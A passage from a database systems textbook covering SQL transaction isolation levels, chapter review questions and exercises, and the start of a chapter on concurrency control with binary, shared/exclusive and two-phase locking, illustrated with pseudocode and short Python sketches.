w1(Y); r2(X); w2(X); With the additional knowledge, or semantics, that the operations between each ri(I) and wi(I) are commutative, we know that the order of executing the sequences con- sisting of (read, update, write) is not important as long as each (read, update, write) sequence by a particular transaction Ti on a particular item I is not interrupted by conflicting operations. Hence, the schedule Sh is considered to be correct even though it is not serializable. Researchers have been working on extending concur- rency control theory to deal with cases where serializability is considered to be too restrictive as a condition for correctness of schedules. Also, in certain domains of applications such as computer aided design (CAD) of complex systems like aircraft, 773 Introduction to Transaction Processing Concepts and Theory design transactions last over a long time period. In such applications, more relaxed schemes of concurrency control have been proposed to maintain consistency of the database. 6 Transaction Support in SQL In this section, we give a brief introduction to transaction support in SQL. There are many more details, and the newer standards have more commands for transaction processing. The basic definition of an SQL transaction is similar to our already defined concept of a transaction. 
That is, it is a logical unit of work and is guaranteed to be atomic. A single SQL statement is always considered to be atomic—either it completes execution without an error or it fails and leaves the database unchanged. With SQL, there is no explicit Begin_Transaction statement. Transaction initiation is done implicitly when particular SQL statements are encountered. However, every transaction must have an explicit end statement, which is either a COMMIT or a ROLLBACK. Every transaction has certain characteristics attributed to it. These characteristics are specified by a SET TRANSACTION statement in SQL. The characteristics are the access mode, the diagnostic area size, and the isolation level. The access mode can be specified as READ ONLY or READ WRITE. The default is READ WRITE, unless the isolation level of READ UNCOMMITTED is specified (see below), in which case READ ONLY is assumed. A mode of READ WRITE allows select, update, insert, delete, and create commands to be executed. A mode of READ ONLY, as the name implies, is simply for data retrieval. The diagnostic area size option, DIAGNOSTIC SIZE n, specifies an integer value n, which indicates the number of conditions that can be held simultaneously in the diagnostic area. These conditions supply feedback information (errors or exceptions) to the user or program on the n most recently executed SQL statements. The isolation level option is specified using the statement ISOLATION LEVEL <isolation>, where the value for <isolation> can be READ UNCOMMITTED, READ
COMMITTED, REPEATABLE READ, or SERIALIZABLE.13 The default isolation level is
SERIALIZABLE, although some systems use READ COMMITTED as their default. The
use of the term SERIALIZABLE here is based on not allowing violations that cause
dirty read, unrepeatable read, and phantoms,14 and it is thus not identical to the way
serializability was defined earlier in Section 5. If a transaction executes at a lower
isolation level than SERIALIZABLE, then one or more of the following three viola-
tions may occur:

1. Dirty read. A transaction T1 may read the update of a transaction T2, which
has not yet committed. If T2 fails and is aborted, then T1 would have read a
value that does not exist and is incorrect.

13These are similar to the isolation levels discussed briefly at the end of Section 3.
14The dirty read and unrepeatable read problems were discussed in Section 1.3.


Table 1 Possible Violations Based on Isolation Levels as Defined in SQL

                                   Type of Violation
Isolation Level        Dirty Read    Nonrepeatable Read    Phantom
READ UNCOMMITTED       Yes           Yes                   Yes
READ COMMITTED         No            Yes                   Yes
REPEATABLE READ        No            No                    Yes
SERIALIZABLE           No            No                    No

2. Nonrepeatable read. A transaction T1 may read a given value from a table. If
another transaction T2 later updates that value and T1 reads that value again,
T1 will see a different value.

3. Phantoms. A transaction T1 may read a set of rows from a table, perhaps
based on some condition specified in the SQL WHERE-clause. Now suppose
that a transaction T2 inserts a new row that also satisfies the WHERE-clause
condition used in T1, into the table used by T1. If T1 is repeated, then T1 will
see a phantom, a row that previously did not exist.

Table 1 summarizes the possible violations for the different isolation levels. An entry
of Yes indicates that a violation is possible and an entry of No indicates that it is not
possible. READ UNCOMMITTED is the most forgiving, and SERIALIZABLE is the
most restrictive in that it avoids all three of the problems mentioned above.
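Dirty reads—the first violation in Table 1—can also be spotted mechanically in the schedule notation of Section 4. The following sketch reuses the same assumed (op, txn, item) triple encoding from the earlier examples and simply flags reads of uncommitted data; it is an illustration, not a DBMS mechanism.

```python
def dirty_reads(schedule):
    """Flag reads of values written by a transaction that has not yet
    committed at the time of the read (potential dirty reads). Commit ('c')
    and abort ('a') entries carry item = None."""
    found, committed, last_writer = [], set(), {}
    for op, txn, item in schedule:
        if op == 'c':
            committed.add(txn)
        elif op == 'w':
            last_writer[item] = txn
        elif op == 'r':
            writer = last_writer.get(item)
            if writer is not None and writer != txn and writer not in committed:
                found.append((txn, item, writer))
    return found

# Schedule Sc from Section 4.2: T2 reads X from the still-uncommitted T1.
Sc = [('r',1,'X'), ('w',1,'X'), ('r',2,'X'), ('r',1,'Y'),
      ('w',2,'X'), ('c',2,None), ('a',1,None)]
print(dirty_reads(Sc))   # -> [(2, 'X', 1)]
```

A schedule containing such a read cannot be cascadeless in the sense of Section 4.2, which is exactly the risk that READ COMMITTED and the stricter levels rule out.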

A sample SQL transaction might look like the following:

EXEC SQL WHENEVER SQLERROR GOTO UNDO;
EXEC SQL SET TRANSACTION

READ WRITE
DIAGNOSTIC SIZE 5
ISOLATION LEVEL SERIALIZABLE;

EXEC SQL INSERT INTO EMPLOYEE (Fname, Lname, Ssn, Dno, Salary)
VALUES ('Robert', 'Smith', '991004321', 2, 35000);

EXEC SQL UPDATE EMPLOYEE
SET Salary = Salary * 1.1 WHERE Dno = 2;

EXEC SQL COMMIT;
GOTO THE_END;
UNDO: EXEC SQL ROLLBACK;
THE_END: … ;

The above transaction consists of first inserting a new row in the EMPLOYEE table
and then updating the salary of all employees who work in department 2. If an error
occurs on any of the SQL statements, the entire transaction is rolled back. This
implies that any updated salary (by this transaction) would be restored to its previ-
ous value and that the newly inserted row would be removed.
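For comparison, a host program written against a Python DB-API driver would typically follow the same pattern—set the transaction characteristics, perform the updates, and either commit or roll back. This is only a sketch: the module name dbdriver and the connection string are placeholders, and the SET TRANSACTION clauses accepted (access mode, diagnostics size, isolation level) vary from one DBMS to another.

```python
import dbdriver   # placeholder name; substitute an actual DB-API 2.0 driver

conn = dbdriver.connect("dsn=company_db")        # hypothetical connection details
try:
    cur = conn.cursor()
    # Transaction characteristics; exact syntax and supported options are
    # DBMS-specific, so consult the product documentation.
    cur.execute("SET TRANSACTION ISOLATION LEVEL SERIALIZABLE")
    cur.execute(
        "INSERT INTO EMPLOYEE (Fname, Lname, Ssn, Dno, Salary) "
        "VALUES ('Robert', 'Smith', '991004321', 2, 35000)")
    cur.execute("UPDATE EMPLOYEE SET Salary = Salary * 1.1 WHERE Dno = 2")
    conn.commit()                                # corresponds to EXEC SQL COMMIT
except dbdriver.Error:
    conn.rollback()                              # corresponds to EXEC SQL ROLLBACK
```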

As we have seen, SQL provides a number of transaction-oriented features. The DBA
or database programmers can take advantage of these options to try improving


transaction performance by relaxing serializability if that is acceptable for their
applications.

7 Summary
In this chapter we discussed DBMS concepts for transaction processing. We intro-
duced the concept of a database transaction and the operations relevant to transac-
tion processing. We compared single-user systems to multiuser systems and then
presented examples of how uncontrolled execution of concurrent transactions in a
multiuser system can lead to incorrect results and database values. We also discussed
the various types of failures that may occur during transaction execution.

Next we introduced the typical states that a transaction passes through during execu-
tion, and discussed several concepts that are used in recovery and concurrency con-
trol methods. The system log keeps track of database accesses, and the system uses
this information to recover from failures. A transaction either succeeds and reaches
its commit point or it fails and has to be rolled back. A committed transaction has its
changes permanently recorded in the database. We presented an overview of the
desirable properties of transactions—atomicity, consistency preservation, isolation,
and durability—which are often referred to as the ACID properties.

Then we defined a schedule (or history) as an execution sequence of the operations
of several transactions with possible interleaving. We characterized schedules in
terms of their recoverability. Recoverable schedules ensure that, once a transaction
commits, it never needs to be undone. Cascadeless schedules add an additional con-
dition to ensure that no aborted transaction requires the cascading abort of other
transactions. Strict schedules provide an even stronger condition that allows a sim-
ple recovery scheme consisting of restoring the old values of items that have been
changed by an aborted transaction.

We defined equivalence of schedules and saw that a serializable schedule is equiva-
lent to some serial schedule. We defined the concepts of conflict equivalence and
view equivalence, which led to definitions for conflict serializability and view serial-
izability. A serializable schedule is considered correct. We presented an algorithm
for testing the (conflict) serializability of a schedule. We discussed why testing for
serializability is impractical in a real system, although it can be used to define and
verify concurrency control protocols, and we briefly mentioned less restrictive defi-
nitions of schedule equivalence. Finally, we gave a brief overview of how transaction
concepts are used in practice within SQL.

Review Questions
1. What is meant by the concurrent execution of database transactions in a

multiuser system? Discuss why concurrency control is needed, and give
informal examples.


2. Discuss the different types of failures. What is meant by catastrophic failure?

3. Discuss the actions taken by the read_item and write_item operations on a
database.

4. Draw a state diagram and discuss the typical states that a transaction goes
through during execution.

5. What is the system log used for? What are the typical kinds of records in a
system log? What are transaction commit points, and why are they impor-
tant?

6. Discuss the atomicity, durability, isolation, and consistency preservation
properties of a database transaction.

7. What is a schedule (history)? Define the concepts of recoverable, cascadeless,
and strict schedules, and compare them in terms of their recoverability.

8. Discuss the different measures of transaction equivalence. What is the differ-
ence between conflict equivalence and view equivalence?

9. What is a serial schedule? What is a serializable schedule? Why is a serial
schedule considered correct? Why is a serializable schedule considered cor-
rect?

10. What is the difference between the constrained write and the unconstrained
write assumptions? Which is more realistic?

11. Discuss how serializability is used to enforce concurrency control in a data-
base system. Why is serializability sometimes considered too restrictive as a
measure of correctness for schedules?

12. Describe the four levels of isolation in SQL.

13. Define the violations caused by each of the following: dirty read, nonrepeat-
able read, and phantoms.

Exercises
14. Change transaction T2 in Figure 2(b) to read

read_item(X);
X := X + M;
if X > 90 then exit
else write_item(X);

Discuss the final result of the different schedules in Figure 3(a) and (b),
where M = 2 and N = 2, with respect to the following questions: Does adding
the above condition change the final outcome? Does the outcome obey the
implied consistency rule (that the capacity of X is 90)?

15. Repeat Exercise 14, adding a check in T1 so that Y does not exceed 90.


16. Add the operation commit at the end of each of the transactions T1 and T2 in
Figure 2, and then list all possible schedules for the modified transactions.
Determine which of the schedules are recoverable, which are cascadeless,
and which are strict.

17. List all possible schedules for transactions T1 and T2 in Figure 2, and deter-
mine which are conflict serializable (correct) and which are not.

18. How many serial schedules exist for the three transactions in Figure 8(a)?
What are they? What is the total number of possible schedules?

19. Write a program to create all possible schedules for the three transactions in
Figure 8(a), and to determine which of those schedules are conflict serializ-
able and which are not. For each conflict-serializable schedule, your program
should print the schedule and list all equivalent serial schedules.

20. Why is an explicit transaction end statement needed in SQL but not an
explicit begin statement?

21. Describe situations where each of the different isolation levels would be use-
ful for transaction processing.

22. Which of the following schedules is (conflict) serializable? For each serializ-
able schedule, determine the equivalent serial schedules.

a. r1(X); r3(X); w1(X); r2(X); w3(X);

b. r1(X); r3(X); w3(X); w1(X); r2(X);

c. r3(X); r2(X); w3(X); r1(X); w1(X);

d. r3(X); r2(X); r1(X); w3(X); w1(X);

23. Consider the three transactions T1, T2, and T3, and the schedules S1 and S2
given below. Draw the serializability (precedence) graphs for S1 and S2, and
state whether each schedule is serializable or not. If a schedule is serializable,
write down the equivalent serial schedule(s).

T1: r1 (X); r1 (Z); w1 (X);
T2: r2 (Z); r2 (Y); w2 (Z); w2 (Y);
T3: r3 (X); r3 (Y); w3 (Y);
S1: r1 (X); r2 (Z); r1 (Z); r3 (X); r3 (Y); w1 (X); w3 (Y); r2 (Y); w2 (Z); w2 (Y);
S2: r1 (X); r2 (Z); r3 (X); r1 (Z); r2 (Y); r3 (Y); w1 (X); w2 (Z); w3 (Y); w2 (Y);

24. Consider schedules S3, S4, and S5 below. Determine whether each schedule is
strict, cascadeless, recoverable, or nonrecoverable. (Determine the strictest
recoverability condition that each schedule satisfies.)

S3: r1 (X); r2 (Z); r1 (Z); r3 (X); r3 (Y); w1 (X); c1; w3 (Y); c3; r2 (Y); w2 (Z);
w2 (Y); c2;

S4: r1 (X); r2 (Z); r1 (Z); r3 (X); r3 (Y); w1 (X); w3 (Y); r2 (Y); w2 (Z); w2 (Y); c1;
c2; c3;

S5: r1 (X); r2 (Z); r3 (X); r1 (Z); r2 (Y); r3 (Y); w1 (X); c1; w2 (Z); w3 (Y); w2 (Y);
c3; c2;


Selected Bibliography
The concept of serializability and related ideas to maintain consistency in a database
were introduced in Gray et al. (1975). The concept of the database transaction was
first discussed in Gray (1981). Gray won the coveted ACM Turing Award in 1998 for
his work on database transactions and implementation of transactions in relational
DBMSs. Bernstein, Hadzilacos, and Goodman (1988) focus on concurrency control
and recovery techniques in both centralized and distributed database systems; it is
an excellent reference. Papadimitriou (1986) offers a more theoretical perspective. A
large reference book of more than a thousand pages by Gray and Reuter (1993)
offers a more practical perspective of transaction processing concepts and tech-
niques. Elmagarmid (1992) offers collections of research papers on transaction pro-
cessing for advanced applications. Transaction support in SQL is described in Date
and Darwen (1997). View serializability is defined in Yannakakis (1984).
Recoverability of schedules and reliability in databases is discussed in Hadzilacos
(1983, 1988).


Concurrency Control
Techniques

In this chapter we discuss a number of concurrency control techniques that are used to ensure the nonin-
terference or isolation property of concurrently executing transactions. Most of
these techniques ensure serializability of schedules—using concurrency control
protocols (sets of rules) that guarantee serializability. One important set of proto-
cols—known as two-phase locking protocols—employ the technique of locking data
items to prevent multiple transactions from accessing the items concurrently; a
number of locking protocols are described in Sections 1 and 3.2. Locking protocols
are used in most commercial DBMSs. Another set of concurrency control protocols
use timestamps. A timestamp is a unique identifier for each transaction, generated
by the system. Timestamp values are generated in the same order as the transaction
start times. Concurrency control protocols that use timestamp ordering to ensure
serializability are introduced in Section 2. In Section 3 we discuss multiversion con-
currency control protocols that use multiple versions of a data item. One multiver-
sion protocol extends timestamp order to multiversion timestamp ordering
(Section 3.1), and another extends two-phase locking (Section 3.2). In Section 4 we
present a protocol based on the concept of validation or certification of a transac-
tion after it executes its operations; these are sometimes called optimistic
protocols, and also assume that multiple versions of a data item can exist.

Another factor that affects concurrency control is the granularity of the data
items—that is, what portion of the database a data item represents. An item can be
as small as a single attribute (field) value or as large as a disk block, or even a whole
file or the entire database. We discuss granularity of items and a multiple granular-
ity concurrency control protocol, which is an extension of two-phase locking, in
Section 5. In Section 6 we describe concurrency control issues that arise when

From Chapter 22 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.


indexes are used to process transactions, and in Section 7 we discuss some addi-
tional concurrency control concepts. Section 8 summarizes the chapter.

It is sufficient to read Sections 1, 5, 6, and 7, and possibly 3.2, if your main interest is
an introduction to the concurrency control techniques that are based on locking,
which are used most often in practice. The other techniques are mainly of theoreti-
cal interest.

1 Two-Phase Locking Techniques
for Concurrency Control

Some of the main techniques used to control concurrent execution of transactions
are based on the concept of locking data items. A lock is a variable associated with a
data item that describes the status of the item with respect to possible operations
that can be applied to it. Generally, there is one lock for each data item in the data-
base. Locks are used as a means of synchronizing the access by concurrent transac-
tions to the database items. In Section 1.1 we discuss the nature and types of locks.
Then, in Section 1.2 we present protocols that use locking to guarantee serializabil-
ity of transaction schedules. Finally, in Section 1.3 we describe two problems associ-
ated with the use of locks—deadlock and starvation—and show how these
problems are handled in concurrency control protocols.

1.1 Types of Locks and System Lock Tables
Several types of locks are used in concurrency control. To introduce locking con-
cepts gradually, first we discuss binary locks, which are simple, but are also too
restrictive for database concurrency control purposes, and so are not used in practice.
Then we discuss shared/exclusive locks—also known as read/write locks—which
provide more general locking capabilities and are used in practical database locking
schemes. In Section 3.2 we describe an additional type of lock called a certify lock,
and show how it can be used to improve performance of locking protocols.

Binary Locks. A binary lock can have two states or values: locked and unlocked (or
1 and 0, for simplicity). A distinct lock is associated with each database item X. If the
value of the lock on X is 1, item X cannot be accessed by a database operation that
requests the item. If the value of the lock on X is 0, the item can be accessed when
requested, and the lock value is changed to 1. We refer to the current value (or state)
of the lock associated with item X as LOCK(X).

Two operations, lock_item and unlock_item, are used with binary locking. A transaction
requests access to an item X by first issuing a lock_item(X) operation. If LOCK(X) =
1, the transaction is forced to wait. If LOCK(X) = 0, it is set to 1 (the transaction locks
the item) and the transaction is allowed to access item X. When the transaction is
through using the item, it issues an unlock_item(X) operation, which sets LOCK(X)
back to 0 (unlocks the item) so that X may be accessed by other transactions. Hence,
a binary lock enforces mutual exclusion on the data item. A description of the
lock_item(X) and unlock_item(X) operations is shown in Figure 1.


lock_item(X):
B:  if LOCK(X) = 0                      (* item is unlocked *)
        then LOCK(X) ← 1                (* lock the item *)
        else begin
            wait (until LOCK(X) = 0
                and the lock manager wakes up the transaction);
            go to B
        end;

unlock_item(X):
    LOCK(X) ← 0;                        (* unlock the item *)
    if any transactions are waiting
        then wakeup one of the waiting transactions;

Figure 1: Lock and unlock operations for binary locks.

Notice that the lock_item and unlock_item operations must be implemented as indi-
visible units (known as critical sections in operating systems); that is, no interleav-
ing should be allowed once a lock or unlock operation is started until the operation
terminates or the transaction waits. In Figure 1, the wait command within the
lock_item(X) operation is usually implemented by putting the transaction in a wait-
ing queue for item X until X is unlocked and the transaction can be granted access
to it. Other transactions that also want to access X are placed in the same queue.
Hence, the wait command is considered to be outside the lock_item operation.

It is quite simple to implement a binary lock; all that is needed is a binary-valued
variable, LOCK, associated with each data item X in the database. In its simplest
form, each lock can be a record with three fields: <Data_item_name, LOCK, Locking_transaction>, plus a queue for transactions that are waiting to access the item.
The system needs to maintain only these records for the items that are currently locked
in a lock table, which could be organized as a hash file on the item name. Items not
in the lock table are considered to be unlocked. The DBMS has a lock manager sub-
system to keep track of and control access to locks.

If the simple binary locking scheme described here is used, every transaction must
obey the following rules:

1. A transaction T must issue the operation lock_item(X) before any
read_item(X) or write_item(X) operations are performed in T.

2. A transaction T must issue the operation unlock_item(X) after all read_item(X)
and write_item(X) operations are completed in T.

3. A transaction T will not issue a lock_item(X) operation if it already holds the
lock on item X.1

4. A transaction T will not issue an unlock_item(X) operation unless it already
holds the lock on item X.

1This rule may be removed if we modify the lock_item (X) operation in Figure 1 so that if the item is cur-
rently locked by the requesting transaction, the lock is granted.


These rules can be enforced by the lock manager module of the DBMS. Between the
lock_item(X) and unlock_item(X) operations in transaction T, T is said to hold the
lock on item X. At most one transaction can hold the lock on a particular item.
Thus no two transactions can access the same item concurrently.
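
The behavior of Figure 1 and rules 1 through 4 can be sketched in a few lines of Python. This is a minimal illustration only, assuming an in-memory lock table that stores records just for currently locked items, as described above; the class and method names are our own, not those of any particular DBMS.

    import threading

    class BinaryLockManager:
        """Minimal sketch of a binary-lock table: only currently locked items are stored."""

        def __init__(self):
            self.cond = threading.Condition()   # makes lock/unlock indivisible; also holds waiters
            self.table = {}                     # item name -> transaction currently holding the lock

        def lock_item(self, item, txn):
            with self.cond:
                while item in self.table:       # LOCK(X) = 1: the transaction must wait
                    self.cond.wait()
                self.table[item] = txn          # LOCK(X) <- 1: grant the lock to txn

        def unlock_item(self, item, txn):
            with self.cond:
                if self.table.get(item) == txn: # rule 4: only the holder may unlock
                    del self.table[item]        # LOCK(X) <- 0
                    self.cond.notify_all()      # wake the waiting transactions

    # Example: T1 locks X, uses it, and unlocks it so another transaction can proceed.
    mgr = BinaryLockManager()
    mgr.lock_item("X", "T1")
    mgr.unlock_item("X", "T1")

Because the sketch uses a single shared condition variable, it wakes all waiters rather than exactly one; the scheme described above keeps a separate waiting queue per item and wakes one transaction at a time.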

Shared/Exclusive (or Read/Write) Locks. The preceding binary locking
scheme is too restrictive for database items because at most, one transaction can
hold a lock on a given item. We should allow several transactions to access the same
item X if they all access X for reading purposes only. This is because read operations
on the same item by different transactions are not conflicting. However, if a transac-
tion is to write an item X, it must have exclusive access to X. For this purpose, a dif-
ferent type of lock called a multiple-mode lock is used. In this scheme—called
shared/exclusive or read/write locks—there are three locking operations:
read_lock(X), write_lock(X), and unlock(X). A lock associated with an item X,
LOCK(X), now has three possible states: read-locked, write-locked, or unlocked. A
read-locked item is also called share-locked because other transactions are allowed
to read the item, whereas a write-locked item is called exclusive-locked because a
single transaction exclusively holds the lock on the item.

One method for implementing the preceding operations on a read/write lock is to
keep track of the number of transactions that hold a shared (read) lock on an item
in the lock table. Each record in the lock table will have four fields: <Data_item_name, LOCK, No_of_reads, Locking_transaction(s)>. Again, to save space, the system needs to
maintain lock records only for locked items in the lock table. The value (state) of
LOCK is either read-locked or write-locked, suitably coded (if we assume no records
are kept in the lock table for unlocked items). If LOCK(X)=write-locked, the value of
locking_transaction(s) is a single transaction that holds the exclusive (write) lock
on X. If LOCK(X)=read-locked, the value of locking_transaction(s) is a list of one or
more transactions that hold the shared (read) lock on X. The three operations
read_lock(X), write_lock(X), and unlock(X) are described in Figure 2.2 As before, each
of the three locking operations should be considered indivisible; no interleaving
should be allowed once one of the operations is started until either the operation
terminates by granting the lock or the transaction is placed in a waiting queue for
the item.

When we use the shared/exclusive locking scheme, the system must enforce the fol-
lowing rules:

1. A transaction T must issue the operation read_lock(X) or write_lock(X) before
any read_item(X) operation is performed in T.

2. A transaction T must issue the operation write_lock(X) before any
write_item(X) operation is performed in T.

2These algorithms do not allow upgrading or downgrading of locks, as described later in this section. The
reader can extend the algorithms to allow these additional operations.


read_lock(X):
B:  if LOCK(X) = “unlocked”
        then begin LOCK(X) ← “read-locked”;
            no_of_reads(X) ← 1
        end
    else if LOCK(X) = “read-locked”
        then no_of_reads(X) ← no_of_reads(X) + 1
    else begin
        wait (until LOCK(X) = “unlocked”
            and the lock manager wakes up the transaction);
        go to B
    end;

write_lock(X):
B:  if LOCK(X) = “unlocked”
        then LOCK(X) ← “write-locked”
        else begin
            wait (until LOCK(X) = “unlocked”
                and the lock manager wakes up the transaction);
            go to B
        end;

unlock(X):
    if LOCK(X) = “write-locked”
        then begin LOCK(X) ← “unlocked”;
            wakeup one of the waiting transactions, if any
        end
    else if LOCK(X) = “read-locked”
        then begin
            no_of_reads(X) ← no_of_reads(X) − 1;
            if no_of_reads(X) = 0
                then begin LOCK(X) ← “unlocked”;
                    wakeup one of the waiting transactions, if any
                end
        end;

Figure 2: Locking and unlocking operations for two-mode (read/write, or shared/exclusive) locks.

3. A transaction T must issue the operation unlock(X) after all read_item(X) and
write_item(X) operations are completed in T.3

4. A transaction T will not issue a read_lock(X) operation if it already holds a
read (shared) lock or a write (exclusive) lock on item X. This rule may be
relaxed, as we discuss shortly.

3This rule may be relaxed to allow a transaction to unlock an item, then lock it again later.


5. A transaction T will not issue a write_lock(X) operation if it already holds a
read (shared) lock or write (exclusive) lock on item X. This rule may also be
relaxed, as we discuss shortly.

6. A transaction T will not issue an unlock(X) operation unless it already holds
a read (shared) lock or a write (exclusive) lock on item X.

Conversion of Locks. Sometimes it is desirable to relax conditions 4 and 5 in the
preceding list in order to allow lock conversion; that is, a transaction that already
holds a lock on item X is allowed under certain conditions to convert the lock from
one locked state to another. For example, it is possible for a transaction T to issue a
read_lock(X) and then later to upgrade the lock by issuing a write_lock(X) operation.
If T is the only transaction holding a read lock on X at the time it issues the
write_lock(X) operation, the lock can be upgraded; otherwise, the transaction must
wait. It is also possible for a transaction T to issue a write_lock(X) and then later to
downgrade the lock by issuing a read_lock(X) operation. When upgrading and
downgrading of locks is used, the lock table must include transaction identifiers in
the record structure for each lock (in the locking_transaction(s) field) to store the
information on which transactions hold locks on the item. The descriptions of the
read_lock(X) and write_lock(X) operations in Figure 2 must be changed appropri-
ately to allow for lock upgrading and downgrading. We leave this as an exercise for
the reader.
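
As a rough illustration of how the Figure 2 operations might be extended with the upgrade just described, here is a Python sketch; the class name RWLockManager and the dictionary-based lock table are our own, and downgrading as well as the fairness of the waiting queue are not modeled.

    import threading

    class RWLockManager:
        """Sketch of shared/exclusive locks with read-to-write upgrade (no downgrade)."""

        def __init__(self):
            self.cond = threading.Condition()
            self.locks = {}   # item -> {"mode": "read" or "write", "holders": set of transactions}

        def read_lock(self, item, txn):
            with self.cond:
                while item in self.locks and self.locks[item]["mode"] == "write":
                    self.cond.wait()                        # write-locked by someone else: wait
                rec = self.locks.setdefault(item, {"mode": "read", "holders": set()})
                rec["holders"].add(txn)                     # share the read lock

        def write_lock(self, item, txn):
            with self.cond:
                while True:
                    rec = self.locks.get(item)
                    if rec is None:
                        break                               # unlocked: grant the exclusive lock
                    if rec["mode"] == "read" and rec["holders"] == {txn}:
                        break                               # upgrade: txn is the only reader
                    self.cond.wait()
                self.locks[item] = {"mode": "write", "holders": {txn}}

        def unlock(self, item, txn):
            with self.cond:
                rec = self.locks.get(item)
                if rec and txn in rec["holders"]:
                    rec["holders"].discard(txn)
                    if not rec["holders"]:                  # last reader gone, or the writer is done
                        del self.locks[item]
                    self.cond.notify_all()

A production lock manager would also keep the pending requests in a queue per item so that waiting transactions can be granted locks in a fair order, a point that matters for the starvation problem discussed in Section 1.3.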

Using binary locks or read/write locks in transactions, as described earlier, does not
guarantee serializability of schedules on its own. Figure 3 shows an example where
the preceding locking rules are followed but a nonserializable schedule may result.
This is because in Figure 3(a) the items Y in T1 and X in T2 were unlocked too early.
This allows a schedule such as the one shown in Figure 3(c) to occur, which is not a
serializable schedule and hence gives incorrect results. To guarantee serializability,
we must follow an additional protocol concerning the positioning of locking and
unlocking operations in every transaction. The best-known protocol, two-phase
locking, is described in the next section.

1.2 Guaranteeing Serializability by Two-Phase Locking
A transaction is said to follow the two-phase locking protocol if all locking opera-
tions (read_lock, write_lock) precede the first unlock operation in the transaction.4

Such a transaction can be divided into two phases: an expanding or growing (first)
phase, during which new locks on items can be acquired but none can be released;
and a shrinking (second) phase, during which existing locks can be released but no
new locks can be acquired. If lock conversion is allowed, then upgrading of locks
(from read-locked to write-locked) must be done during the expanding phase, and
downgrading of locks (from write-locked to read-locked) must be done in the

4This is unrelated to the two-phase commit protocol for recovery in distributed databases.


(a) Two transactions T1 and T2:

    T1: read_lock(Y); read_item(Y); unlock(Y);
        write_lock(X); read_item(X); X := X + Y; write_item(X); unlock(X);

    T2: read_lock(X); read_item(X); unlock(X);
        write_lock(Y); read_item(Y); Y := X + Y; write_item(Y); unlock(Y);

(b) Results of possible serial schedules, with initial values X = 20, Y = 30:

    Result of serial schedule T1 followed by T2: X = 50, Y = 80
    Result of serial schedule T2 followed by T1: X = 70, Y = 50

(c) A nonserializable schedule S that uses locks (time runs downward):

    T1: read_lock(Y); read_item(Y); unlock(Y);
    T2: read_lock(X); read_item(X); unlock(X);
        write_lock(Y); read_item(Y); Y := X + Y; write_item(Y); unlock(Y);
    T1: write_lock(X); read_item(X); X := X + Y; write_item(X); unlock(X);

    Result of schedule S: X = 50, Y = 50 (nonserializable)

Figure 3: Transactions that do not obey two-phase locking. (a) Two transactions T1 and T2.
(b) Results of possible serial schedules of T1 and T2. (c) A nonserializable schedule S that uses locks.

shrinking phase. Hence, a read_lock(X) operation that downgrades an already held
write lock on X can appear only in the shrinking phase.

Transactions T1 and T2 in Figure 3(a) do not follow the two-phase locking protocol
because the write_lock(X) operation follows the unlock(Y) operation in T1, and simi-
larly the write_lock(Y) operation follows the unlock(X) operation in T2. If we enforce
two-phase locking, the transactions can be rewritten as T1′ and T2′, as shown in
Figure 4. Now, the schedule shown in Figure 3(c) is not permitted for T1′ and T2′
(with their modified order of locking and unlocking operations) under the rules of
locking described in Section 1.1 because T1′ will issue its write_lock(X) before it
unlocks item Y; consequently, when T2′ issues its read_lock(X), it is forced to wait
until T1′ releases the lock by issuing an unlock(X) in the schedule.


T1′: read_lock(Y); read_item(Y);
     write_lock(X);
     unlock(Y);
     read_item(X); X := X + Y; write_item(X);
     unlock(X);

T2′: read_lock(X); read_item(X);
     write_lock(Y);
     unlock(X);
     read_item(Y); Y := X + Y; write_item(Y);
     unlock(Y);

Figure 4: Transactions T1′ and T2′, which are the same as T1 and T2 in Figure 3 but
follow the two-phase locking protocol. Note that they can produce a deadlock.

It can be proved that, if every transaction in a schedule follows the two-phase lock-
ing protocol, the schedule is guaranteed to be serializable, obviating the need to test
for serializability of schedules. The locking protocol, by enforcing two-phase lock-
ing rules, also enforces serializability.

Two-phase locking may limit the amount of concurrency that can occur in a sched-
ule because a transaction T may not be able to release an item X after it is through
using it if T must lock an additional item Y later; or conversely, T must lock the
additional item Y before it needs it so that it can release X. Hence, X must remain
locked by T until all items that the transaction needs to read or write have been
locked; only then can X be released by T. Meanwhile, another transaction seeking to
access X may be forced to wait, even though T is done with X; conversely, if Y is
locked earlier than it is needed, another transaction seeking to access Y is forced to
wait even though T is not using Y yet. This is the price for guaranteeing serializabil-
ity of all schedules without having to check the schedules themselves.

Although the two-phase locking protocol guarantees serializability (that is, every
schedule that is permitted is serializable), it does not permit all possible serializable
schedules (that is, some serializable schedules will be prohibited by the protocol).

Basic, Conservative, Strict, and Rigorous Two-Phase Locking. There are a
number of variations of two-phase locking (2PL). The technique just described is
known as basic 2PL. A variation known as conservative 2PL (or static 2PL)
requires a transaction to lock all the items it accesses before the transaction begins
execution, by predeclaring its read-set and write-set. Recall that the read-set of a
transaction is the set of all items that the transaction reads, and the write-set is the
set of all items that it writes. If any of the predeclared items needed cannot be
locked, the transaction does not lock any item; instead, it waits until all the items are
available for locking. Conservative 2PL is a deadlock-free protocol, as we will see in
Section 1.3 when we discuss the deadlock problem. However, it is difficult to use in
practice because of the need to predeclare the read-set and write-set, which is not
possible in many situations.

In practice, the most popular variation of 2PL is strict 2PL, which guarantees strict
schedules. In this variation, a transaction T does not release any of its exclusive


(write) locks until after it commits or aborts. Hence, no other transaction can read
or write an item that is written by T unless T has committed, leading to a strict
schedule for recoverability. Strict 2PL is not deadlock-free. A more restrictive varia-
tion of strict 2PL is rigorous 2PL, which also guarantees strict schedules. In this
variation, a transaction T does not release any of its locks (exclusive or shared) until
after it commits or aborts, and so it is easier to implement than strict 2PL. Notice
the difference between conservative and rigorous 2PL: the former must lock all its
items before it starts, so once the transaction starts it is in its shrinking phase; the lat-
ter does not unlock any of its items until after it terminates (by committing or abort-
ing), so the transaction is in its expanding phase until it ends.

In many cases, the concurrency control subsystem itself is responsible for generat-
ing the read_lock and write_lock requests. For example, suppose the system is to
enforce the strict 2PL protocol. Then, whenever transaction T issues a read_item(X),
the system calls the read_lock(X) operation on behalf of T. If the state of LOCK(X) is
write_locked by some other transaction T′, the system places T in the waiting queue
for item X; otherwise, it grants the read_lock(X) request and permits the
read_item(X) operation of T to execute. On the other hand, if transaction T issues a
write_item(X), the system calls the write_lock(X) operation on behalf of T. If the state
of LOCK(X) is write_locked or read_locked by some other transaction T′, the system
places T in the waiting queue for item X; if the state of LOCK(X) is read_locked and
